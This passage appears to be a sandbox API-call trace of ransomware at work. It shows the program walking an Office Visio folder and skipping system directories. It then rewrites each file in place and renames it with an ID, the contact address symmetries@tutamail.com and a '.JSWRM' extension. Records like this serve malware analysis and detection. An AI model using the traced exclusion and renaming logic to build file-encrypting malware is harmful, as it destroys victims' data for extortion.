(in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c8663f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c8663f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c8663f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x160fe, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EECOMP_U.VSSX", cAlternateFileName="EECOMP~1.VSS")) returned 1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2=".") returned 1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="..") returned 1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="...") returned 1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="windows") returned -1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="recovery") returned -1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="perflogs") returned -1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="documents and settings") returned 1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="system volume information") returned -1 [0147.853] lstrcmpiW (lpString1="EECOMP_U.VSSX", lpString2="msocache") returned -1 [0147.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0147.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECOMP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0147.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0147.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECOMP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECOMP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0147.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0147.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0147.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECOMP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eecomp_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.855] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=90366) returned 1 [0147.855] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x160f0) returned 0x2501e8 [0147.855] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x160f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x160f0, lpOverlapped=0x0) returned 1 [0147.863] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.863] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x160f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x160f0, lpOverlapped=0x0) returned 1 [0147.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.864] CloseHandle (hObject=0x314) returned 1 [0147.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0147.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0147.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0147.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0147.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0147.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0147.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0147.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0147.864] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECOMP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eecomp_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECOMP_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eecomp_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0147.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0147.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0147.865] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f3541d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f3541d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f3541d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x39ee9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEFUND_M.VSSX", cAlternateFileName="EEFUND~2.VSS")) returned 1 [0147.865] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2=".") returned 1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="..") returned 1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="...") returned 1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="windows") returned -1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="recovery") returned -1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="perflogs") returned -1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="documents and settings") returned 1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="system volume information") returned -1 [0147.866] lstrcmpiW (lpString1="EEFUND_M.VSSX", lpString2="msocache") returned -1 [0147.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0147.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0147.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0147.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.868] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=237289) returned 1 [0147.868] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0147.868] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.881] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.881] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.881] CloseHandle (hObject=0x314) returned 1 [0147.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0147.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0147.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0147.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0147.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0147.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.882] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0147.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0147.890] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f5b39d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f5b39d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f5b39d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x39124, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEFUND_U.VSSX", cAlternateFileName="EEFUND~3.VSS")) returned 1 [0147.890] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2=".") returned 1 [0147.890] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="..") returned 1 [0147.890] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="...") returned 1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="windows") returned -1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="recovery") returned -1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="perflogs") returned -1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="documents and settings") returned 1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="system volume information") returned -1 [0147.891] lstrcmpiW (lpString1="EEFUND_U.VSSX", lpString2="msocache") returned -1 [0147.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEFUND_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEFUND_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0147.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0147.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0147.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.892] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=233764) returned 1 [0147.892] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0147.892] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.904] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.904] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.904] CloseHandle (hObject=0x314) returned 1 [0147.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0147.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0147.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0147.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0147.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0147.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0147.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.905] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEFUND_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eefund_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0147.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0147.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0147.906] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19d7f1e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x19d7f1e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x19fdec5, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1fe37, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEFUND_VISIO2013_M.VSSX", cAlternateFileName="EEFUND~1.VSS")) returned 1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2=".") returned 1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="..") returned 1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="...") returned 1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="documents and settings") returned 1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0147.906] lstrcmpiW (lpString1="EEFUND_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0147.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 